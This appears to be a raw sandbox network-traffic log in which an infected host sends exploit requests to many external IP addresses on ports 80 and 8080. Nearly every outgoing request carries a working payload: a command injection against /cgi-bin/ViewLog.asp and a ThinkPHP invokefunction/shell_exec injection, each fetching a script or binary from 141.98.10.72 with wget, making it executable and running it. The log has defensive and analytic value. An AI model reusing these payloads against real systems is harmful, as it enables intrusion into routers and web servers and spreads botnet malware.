Feb 14, 2024 09:30:12.312185049 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:12.542346954 CET	313	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
557	192.168.2.15	36942	95.86.93.3	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:12.343554020 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
558	192.168.2.15	53344	85.158.57.25	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:12.490931988 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:12.695894003 CET	396	IN	HTTP/1.0 401 Authentication Required WWW-Authenticate: Basic realm="proxy" Connection: close Content-type: text/html; charset=us-ascii Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 31 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>401 Authentication Required</title></head><body><h2>401 Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
559	192.168.2.15	35048	94.187.113.218	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:12.587404013 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
560	192.168.2.15	37964	62.29.96.130	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:12.591006994 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
561	192.168.2.15	44426	94.123.127.115	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:12.591123104 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
562	192.168.2.15	59198	95.168.78.3	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:12.672889948 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:13.848824024 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:15.256872892 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:18.264750957 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:23.896672010 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:35.161094904 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:57.687939882 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:42.742419004 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
563	192.168.2.15	60856	95.84.128.154	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:13.322788000 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:14.046566963 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:14.274210930 CET	318	IN	HTTP/1.0 401 Unauthorized Server: httpd Date: Wed, 14 Feb 2024 08:30:13 GMT WWW-Authenticate: Basic realm="MI-MINI" Content-Type: text/html Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 48 34 3e 0a 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 72 65 71 75 69 72 65 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>Authorization required.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
564	192.168.2.15	46758	94.253.13.150	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:13.324790955 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:13.568994999 CET	313	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
565	192.168.2.15	59954	85.208.121.58	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:13.333249092 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:13.585273981 CET	1286	IN	HTTP/1.0 400 Bad Request Server: squid/3.1.23 Mime-Version: 1.0 Date: Wed, 14 Feb 2024 08:00:45 GMT Content-Type: text/html Content-Length: 3167 X-Squid-Error: ERR_INVALID_URL 0 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area /#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/ initial title /#titles h1 {color: #000000;}#titles h2 {color: #000000;}/ special event: FTP success page titles /#titles ftpsuccess {background-color:#00ff00;width:100%;}/ Page displayed body content area */#content {padding: 10px;background: #ffffff

Session ID	Source IP	Source Port	Destination IP	Destination Port
566	192.168.2.15	58052	31.13.207.28	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:13.336677074 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
567	192.168.2.15	53438	31.136.94.21	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:13.774107933 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:14.392828941 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:15.608885050 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:18.264744043 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:23.128722906 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:32.856318951 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:53.591902018 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
